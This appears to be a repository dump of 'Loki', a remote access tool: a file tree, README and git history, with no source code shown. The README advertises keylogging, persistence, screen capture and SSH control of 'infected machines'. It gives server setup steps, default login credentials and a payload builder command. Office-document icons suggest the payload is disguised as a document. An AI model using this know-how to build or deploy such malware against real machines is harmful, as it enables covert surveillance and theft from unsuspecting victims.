======================: FILES :======================
Loki
├── agent
│   ├── bot
│   │   ├── lib
│   │   │   ├── file.py
│   │   │   ├── info.py
│   │   │   ├── __init__.py
│   │   │   ├── keylogger.py
│   │   │   ├── pathfinder.py
│   │   │   ├── screen.py
│   │   │   ├── session.py
│   │   │   ├── sftp.py
│   │   │   ├── shell.py
│   │   │   ├── sscreenshare.py
│   │   │   └── ssh.py
│   │   ├── template_payload.py
│   │   └── template_stager.py
│   ├── builder.py
│   ├── const.py
│   ├── icons
│   │   ├── excelicon.ico
│   │   ├── ppticon.ico
│   │   └── wordicon.ico
│   └── lib
│       ├── args.py
│       ├── file.py
│       └── __init__.py
├── CHANGELOG.md
├── lib
│   ├── const.py
│   ├── database.py
│   ├── __init__.py
│   └── server
│       ├── __init__.py
│       ├── lib
│       │   ├── file.py
│       │   ├── __init__.py
│       │   ├── interface.py
│       │   ├── session.py
│       │   ├── sftp.py
│       │   ├── shell.py
│       │   ├── sscreenshare.py
│       │   └── ssh.py
│       └── server.py
├── LICENSE
├── linter.sh
├── loki.py
├── README.md
├── requirements.txt
├── Screenshots
│   ├── bots.png
│   ├── command.png
│   ├── control.png
│   └── login.png
├── static
│   ├── css
│   │   ├── control.css
│   │   ├── home.css
│   │   ├── index.css
│   │   ├── intel.css
│   │   ├── main.css
│   │   └── settings.css
│   ├── font
│   │   ├── aldrich.ttf
│   │   ├── comfortaa.ttf
│   │   └── inconsolata.ttf
│   ├── js
│   │   ├── command.js
│   │   ├── console.js
│   │   ├── exception.js
│   │   ├── home.js
│   │   ├── index.js
│   │   ├── settings.js
│   │   ├── ssh.js
│   │   └── terminal.js
│   └── vendor
│       ├── bootstrap-4.4.1-dist
│       │   ├── css
│       │   │   ├── bootstrap.css
│       │   │   ├── bootstrap.css.map
│       │   │   ├── bootstrap-grid.css
│       │   │   ├── bootstrap-grid.css.map
│       │   │   ├── bootstrap-grid.min.css
│       │   │   ├── bootstrap-grid.min.css.map
│       │   │   ├── bootstrap.min.css
│       │   │   ├── bootstrap.min.css.map
│       │   │   ├── bootstrap-reboot.css
│       │   │   ├── bootstrap-reboot.css.map
│       │   │   ├── bootstrap-reboot.min.css
│       │   │   └── bootstrap-reboot.min.css.map
│       │   └── js
│       │       ├── bootstrap.bundle.js
│       │       ├── bootstrap.bundle.js.map
│       │       ├── bootstrap.bundle.min.js
│       │       ├── bootstrap.bundle.min.js.map
│       │       ├── bootstrap.js
│       │       ├── bootstrap.js.map
│       │       ├── bootstrap.min.js
│       │       └── bootstrap.min.js.map
│       ├── jquery-3.4.1.min.js
│       └── popper.min.js
└── templates
    ├── base.html
    ├── home.html
    ├── index.html
    └── settings.html

18 directories, 87 files
======================: README CONTENT :======================
# Loki

Loki is a simple **R**emote **A**ccess **T**ool.<br/>
Loki uses **RSA-2048** with **AES-256** to keep your communication with infected machines secure.<br/>

[![Version](https://img.shields.io/badge/Version-v0.1.1-blue)]()
[![Python](https://img.shields.io/badge/Python-v3.6%2B-blue)]()
[![Discord](https://img.shields.io/badge/Discord-server-blue)](https://discord.gg/VYRAZg5)
[![Donate](https://img.shields.io/badge/PayPal-Donate-orange.svg)](https://www.paypal.me/Msheikh03)
<br/><br/>

<img src="Screenshots/bots.png" atl=""/>

### Disclaimer

```
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```

Loki, just like all my other repos is stricly for **educational** purposes.

### Requirements

-   Python **3.6.x** | **3.7.x** | **3.8.x**

### Server tested on

-   Windows 10
-   Kali Linux

### Bot tested on

-   Windows 10

### Payload generator tested on

-   Windows 10

### Features

-   Upload & Download
-   Chrome Launching
-   Persistence
-   Screenshare
-   Screenshot
-   Keylogger
-   SFTP
-   SSH

### Video

https://www.youtube.com/watch?v=UTfZlXGoJ5Y

### Installation

```shell
$> pip install -r requirements.txt
```

### Server side

1. Open `/lib/const.py` & configure your private and public IP's
2. Start loki.py
3. Navigate to http://localhost:5000
4. Login

    ```
    Username: loki
    Password: ikol
    ```

5. Start the server on the same IP as your private IP

### Generate a payload

Navigate to agent directory and run the following command

```shell
$> python builder.py -h
```

**It will not compile inside a virtual environment**

### After connection

-   You can click the id of the bot once it connects

### FYI

-   The bot will call the server using the Public IP, not the private IP
-   The bot will call the server using the port specified on the server tab
====================== GIT HISTORY: ======================
da2d2ad HEAD@{0}: clone: from https://github.com/Bitwise-01/Loki
commit da2d2ad1c55a701886c6b749328e140111aab5ad
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Apr 28 13:05:14 2022 -0400

    Update to work in 2022

commit b7f854df477aa4cf643438ad9c2a274e6b462c49
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Sep 27 17:28:27 2021 -0400

    Minor update

commit 44a4fd8d0c0ce248e418f6c462f90c2866fb24b7
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Sep 27 17:27:22 2021 -0400

    Add variable for ip and port

commit 1a6d37f680e54b86850015895e18be85c4611bd8
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Sep 27 17:26:46 2021 -0400

    Add linter

commit 4116bd183d32c710879414bba38949a5d197b14c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Oct 8 21:06:22 2020 -0400

    Update

commit 44fd6bbcb770c3bb162e74b947aca9b53cfa1046
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Sep 9 12:00:19 2020 -0400

    Update README.md

commit c33745a4eb99cc6f7d68cbc7f949405b6c77c9a9
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Sep 2 23:26:50 2020 -0400

    Make UI cleaner

commit 2d7980b798b8555b43707f4e7836d408d19ea0a6
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 7 16:38:02 2020 -0400

    Update

commit a31d6d36bbdbc21b4292a22a94701b9c2b0f3cf2
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 7 13:17:16 2020 -0400

    Update

commit 0ea0571533a35bf31d468f8fb6ee8787ebf8ec55
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 6 20:28:52 2020 -0400

    Patch persistent console input bug

commit 84ee707b1f55d7bcc17ef3596e2aebd3350109eb
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Aug 3 13:30:46 2020 -0400

    Fixes #30

commit a7360763ac9ae5ca38ed46789643719a472448b8
Author: Mo <Ethical.Hacker720@gmail.com>
Date:   Thu May 14 08:02:00 2020 -0400

    Fix typo

commit 8fd92f1664f7fb2544b81b65ee03c99bc1b4866c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Mar 18 20:58:05 2020 -0400

    Update image

commit 5a866bbe75569a63be079aab1419868081ae3b31
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Mar 18 20:55:46 2020 -0400

    Version 0.1.1

commit c749cf11e72dc27733cce76dbd14a60b8ba3a024
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Sat Oct 19 12:02:53 2019 -0400

    Update

commit f85db5bba7ddb49cba55893eb2a2df3d0546e44a
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Oct 10 01:48:41 2019 -0400

    Update

commit cfe57575b2a41e75e7ccc27fca21a2703de359db
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Oct 10 01:26:19 2019 -0400

    Update

commit 4c2cb3fec4293ef1514bd7ae3b8ad43b8b1be378
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Oct 8 00:01:54 2019 -0400

    Fix typo

commit d78bd98b98d5f3804008a8d0665c08c5323280f1
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 7 00:31:33 2019 -0400

    Add intel css

commit 9438fb9e9e8b22de27fcaa833f3a6f2ad96a5603
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 7 00:05:49 2019 -0400

    Add screenshare

commit e95ab476b71127f4ce084ad9e1695b16eb3958d2
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Oct 2 00:53:08 2019 -0400

    Update

commit f5347c32e504dcbeb4de3dc864274106dbc2078f
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Oct 1 23:42:09 2019 -0400

    Update

commit 7f32c6e437ae721114e147abdaacfe85de4a28b6
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Oct 1 01:27:39 2019 -0400

    Update

commit cc23cc3c40b50c8b17e8db33814b0b8ad57cc16c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Sat Sep 21 14:40:27 2019 -0400

    Update

commit 07a70b8d5014f40178393de0c1d4a70a60af74d9
Author: Mo’ops <Ethical.Hacker720@gmail.com>
Date:   Sat Sep 21 09:38:56 2019 -0400

    Update const.py

commit 06dc7beade1dd5faeeaf14217843c6c59cf687ac
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Fri Apr 26 10:21:28 2019 -0400

    Update

commit 2cdea0dd20a9daaa72b873f161571657728eba19
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Tue Apr 23 17:42:54 2019 -0400

    Remove debug mode

commit c4a582a14855bb828fc8d5bf429114cf87b19d49
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Tue Apr 23 17:22:17 2019 -0400

    Update

commit 6d083666cbd4b2d2a6b8cd041aed6d3a0c531e15
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Tue Apr 23 13:47:14 2019 -0400

    Update

commit 28fbcebfe25631c539f656e98efe789d526432e2
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Feb 19 14:58:16 2019 -0500

    Update control.js

commit 8023370d1bfbee495311965889353f819c8f464f
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Feb 12 21:49:20 2019 -0500

    Improve session clear method

commit 1d81407c46cd8e8947a08769ed95e4e5f2e8725e
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Sat Feb 9 15:02:50 2019 -0500

    Adds Pycryptodome

commit 1e8a7a98bbe85fc51215fd43d3cd037f224efc4c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Feb 7 18:17:27 2019 -0500

    DRYing code

commit 845d80cd22124d0e79104795420badb136ed7607
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Wed Feb 6 11:00:35 2019 -0500

    Fix pathfinder

commit fdb9f84c8029cb71e1a9eb76da6801e1ea5b80a7
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Sat Feb 2 23:58:48 2019 -0500

    Attempts limit fixed

commit e653771d76da2b3b955e337929f41be510d39604
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Sat Feb 2 23:43:18 2019 -0500

    Faster AES decrypt

commit 35d3d8f2129e6759f029833085fdd08973c4529d
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Sat Feb 2 14:02:52 2019 -0500

    Update aes.py

commit 68ee409debd13e281ed5dd6ea2933488b78dfacc
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Fri Feb 1 15:35:31 2019 -0500

    Encrypts payload while in transfer

commit 9775b6dcaa3da513713f9d962b24103bfb0a1216
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Jan 30 15:14:50 2019 -0500

    Update README.md

commit 035d859afb99367971f0e4066239fdf6a578b137
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Jan 30 15:04:58 2019 -0500

    Update README.md

commit 10b97e40bef2f0536ff40a961e2310171dc8a517
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Wed Jan 30 15:00:19 2019 -0500

    Adds Python3.7 Support

commit d940c877cf97139be6b5ca2b65ac252935f270ca
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Jan 29 18:44:16 2019 -0500

    Update template_bot.py

commit 2c4ad9943785ad8064b9cda2a868c924aa2f3cef
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Tue Jan 15 15:23:08 2019 -0500

    Changes ssl.PROTOCOL_TLSv1 to ssl.PROTOCOL_SSLv23

commit 1ced2a6733daf79a7b37aa93aa0cd22c635de682
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Sun Jan 13 14:12:07 2019 -0500

    Indented 4 spaces

commit 4a76afc32348d79b9280c1caace75229a446ef9c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Jan 8 12:35:32 2019 -0500

    Update loki.py

commit 1a489a5fe60744f63c86bb5f635a3f9a209f8e5a
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 29 22:30:19 2018 -0400

    Update requirements.txt

commit ed644d7e98a3114255fa934136e3abbfd38c8333
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Oct 3 09:37:12 2018 -0400

    Update requirements.txt

commit 5acfef2786372b9fda93b755cd762118d9cfb290
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 1 18:54:25 2018 -0400

    Update

commit 3cb50c002e9385975e7357dae8918d49df83d84b
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 1 14:00:52 2018 -0400

    Version 1.1 update

commit 60ec42321138dda590d2f67357753492629d59cf
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Oct 1 13:58:13 2018 -0400

    Version 1.1 update

commit 720068615288ab2d6d6742f962dc8a483f967f1b
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 28 09:16:11 2018 -0400

    Update home.js

commit e2c79706afb9d4eec754a14f3c1b40a604a89ec1
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 28 09:09:55 2018 -0400

    Update home.js

commit 36f77b1d25a41570eb9097a6759ca6c5f10e9aa2
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 28 01:32:06 2018 -0400

    Update

commit 3a91382831a714a1a3f3159753fb1982c94cea7c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 23:37:27 2018 -0400

    Update server.py

commit bd812d64aac44ed181bd8ecbad5364a5da86238f
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 13:09:33 2018 -0400

    Update interface.py

commit 0c0ebdcfd7c1bea816aae97cf8da5d1854182586
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 12:38:35 2018 -0400

    Update sftp.py

commit 4faf93ba3bf370dbe793654aab2b6ece14ef6bcf
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 09:45:13 2018 -0400

    Update README.md

commit 1128bbcbb9c2257a53a3ce2d353b5a2368b6f6e9
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 09:40:13 2018 -0400

    Screenshots

commit 0da23a86fd187746ef6e3d0996d3db082e623d66
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Sep 21 09:15:03 2018 -0400

    Update const.py

commit 3c5bcf53693a29386b0849882e4dcdc720e2b5fa
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Sep 20 17:22:18 2018 -0400

    update

commit 55e2863da7f2a9b567b92e9113179c48963fcc91
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Sep 12 09:37:20 2018 -0400

    Update README.md

commit 0c44937c072951081e95ec6643f8218fa421a86c
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 11 23:18:55 2018 -0400

    update

commit 58c12b9296b43467b589633367da79763efd2f77
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Sep 6 11:41:41 2018 -0400

    updates

commit bf36cc1839491b2fbc0cbfbf68e0ad1d2cb467d5
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Sep 6 11:17:32 2018 -0400

    Update pathfinder.py

commit 48ecd578fe98da97f6668474b31ae3ed1deb8791
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Sep 6 09:20:09 2018 -0400

    minor update

commit f5570b533a0536f9d07439ed4484434ad657afb0
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Sep 5 11:16:31 2018 -0400

    Update builder.py

commit ee187dbe8e2896a5cf50d62a7ba1a916feb6c194
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 16:27:42 2018 -0400

    Update screen.py

commit a5a6ad549f12d9abc447e66d89ef5c4848e38fc8
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 16:26:42 2018 -0400

    Update sftp.py

commit f906a5dec2b4b6820e023e9a505b8b3efb877156
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 16:24:44 2018 -0400

    Update ssh.py

commit ebe5a0889a68b58e5c2783e8576c8d53b7a7f7cf
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 16:17:19 2018 -0400

    fixed a bug

commit b8772a036844730cb91b54b03828fc8af45c0839
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 13:23:18 2018 -0400

    Update shell.py

commit 564d5e104a66a7f4fc7df4814f979cec1f10b369
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 10:08:54 2018 -0400

    Update pathfinder.py

commit 57e2cf005da95d39fe8610785b6d48c817150395
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 09:52:50 2018 -0400

    Update screen.py

commit 2bc68192cedef7426c43dee436072a6bb3b5bf30
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 09:52:11 2018 -0400

    Update template_bot.py

commit 9de393d17345c076915d773efdcdf29cac2dd611
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 08:53:31 2018 -0400

    Update shell.py

commit d1ee99f9251bb5aa3b9ea3679b6c292f29562abd
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 08:40:22 2018 -0400

    Update shell.py

commit 2494007f4a5105571c29d1716a8d6f7ef3dde76e
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 08:32:17 2018 -0400

    PyInstaller hidden

commit 4e2543395fe67593d3d3fade81dfa41c49441467
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 00:55:25 2018 -0400

    Update README.md

commit dbbb31457b09177d28e547e9adb4591f23514f91
Author: Pure-L0G1C <Ethical.Hacker720@gmail.com>
Date:   Tue Sep 4 00:37:41 2018 -0400

    version 1.1

commit 99d195bf98de0e6a2ea5f3644df37037841d6cd0
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 31 16:15:11 2018 -0400

    Add files via upload

commit d3264457fcf4b741a9acd57920189aa71b9f697a
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 31 16:07:27 2018 -0400

    send error fixed

commit e2727d5c537649b2b38e4696be8cc955786074cb
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 31 09:16:02 2018 -0400

    reduced cookie encryption size

commit 5ec1c5780ea27bad3ae3d6aacaf89a7690eac902
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 30 23:09:03 2018 -0400

    Python 3.6 required

commit e783b480c7e78c8024d0a659ff709d2c7c0e2ab0
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Mon Aug 27 17:21:18 2018 -0400

    Update requirements.txt

commit 5c77b38f4439f1e1ed7a57ea6668705778fa9309
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 24 22:17:20 2018 -0400

    Update loki.py

commit 853cf29fcf09c6b7987eba40c573bcf1f40e968d
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 13:36:19 2018 -0400

    Update README.md

commit bbeca2211ec9536f3ef4c73a369e6a1da7479398
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 13:34:30 2018 -0400

    Update README.md

commit e03bf44f5c8b814c79afa48b095ad19fd671f0bc
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 12:04:44 2018 -0400

    Delete crypto.py

commit 4e08e4eb8f1c95b907848f2db8ee22ab6973dda1
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 12:04:33 2018 -0400

    Delete handshake.py

commit cf3e75f85f92765275dcad5503fb57650db8bf09
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 12:04:10 2018 -0400

    Delete crypto.py

commit 95b0152b9557a3994af472450ac44ed2bcb88ee6
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Fri Aug 17 12:03:48 2018 -0400

    Delete handshake.py

commit d62eaa8e1fff858c10858187889e7f5703b294e4
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 20:27:15 2018 -0400

    removed time module

commit c97c352eaccaab6aab9d39d72b4dd455c56380ff
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 19:04:48 2018 -0400

    Update ssh.py

commit efce1f42a3d1cc035461647e13a2c3ef6f682e45
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 19:04:00 2018 -0400

    Update ssh.py

commit b1da0775833a9b1fa3cc56300d883c01c320dc43
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 13:29:43 2018 -0400

    Update bot.py

commit 26c13ddb588566490e188f687e12cf6adf49d78e
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 13:19:28 2018 -0400

    Update interface.py

commit 1d0b14bc37b3b9c9dffa318ac1341a5cb1b3f8e1
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 13:05:25 2018 -0400

    Update interface.py

commit e516853a47d1fa99855518cc7f02b8ae1fb0d3a7
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 12:38:54 2018 -0400

    update

commit 6cd0f5789a602982f459d3b1bf125eeb82edee28
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 12:01:50 2018 -0400

    Delete server.js

commit d8a2f8b640ec0c8993fdf06e67f845b99714e68a
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Thu Aug 16 02:28:01 2018 -0400

    Update shell.py

commit 9bfcc5d2a26292543367ae4663415f96431f06ff
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 22:32:27 2018 -0400

    added an id field to table

commit dc2a4a8c93b4bab76beca62f783df6645c1735cd
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 22:13:10 2018 -0400

    Delete account.js

commit 53cc57d8294e591a3bdf648061873ca218156468
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 22:07:32 2018 -0400

    fixed screenshot bug

commit 08ad3ff4d13f87e180ef3288e67e988a5840b334
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 21:33:41 2018 -0400

    update error handler

commit 1f4a85c76c30efad2211eca18976a5e83469c52d
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 20:55:04 2018 -0400

    exception handling for the ftp

commit ebfdff968401b53881a692fff5580390371525d5
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 20:33:43 2018 -0400

    fixed a few bugs

commit b36095c318ddd97cb4a9d905e3d61a994ddd8e4f
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 00:56:37 2018 -0400

    directory bug fixed

commit 9889bc2128d0238c25df7cf1f254b4d6e11a2cae
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 15 00:25:52 2018 -0400

    UI update

commit 98e12b4c866aeb26aa4fba632332f1202a17e4b3
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Aug 14 16:39:23 2018 -0400

    fixed few bugs

commit db811ae025f5c9ceb15c4a914ea46a9e16feace0
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Wed Aug 8 19:42:46 2018 -0400

    update

commit a9bd3c9f87647f7bc309598051b0320e7a5c1154
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Aug 7 15:16:40 2018 -0400

    Initial commit

commit 550acc51980fb758cae4ad2071105dd51455689f
Author: Mohamed <Ethical.Hacker720@gmail.com>
Date:   Tue Aug 7 15:15:15 2018 -0400

    Initial commit
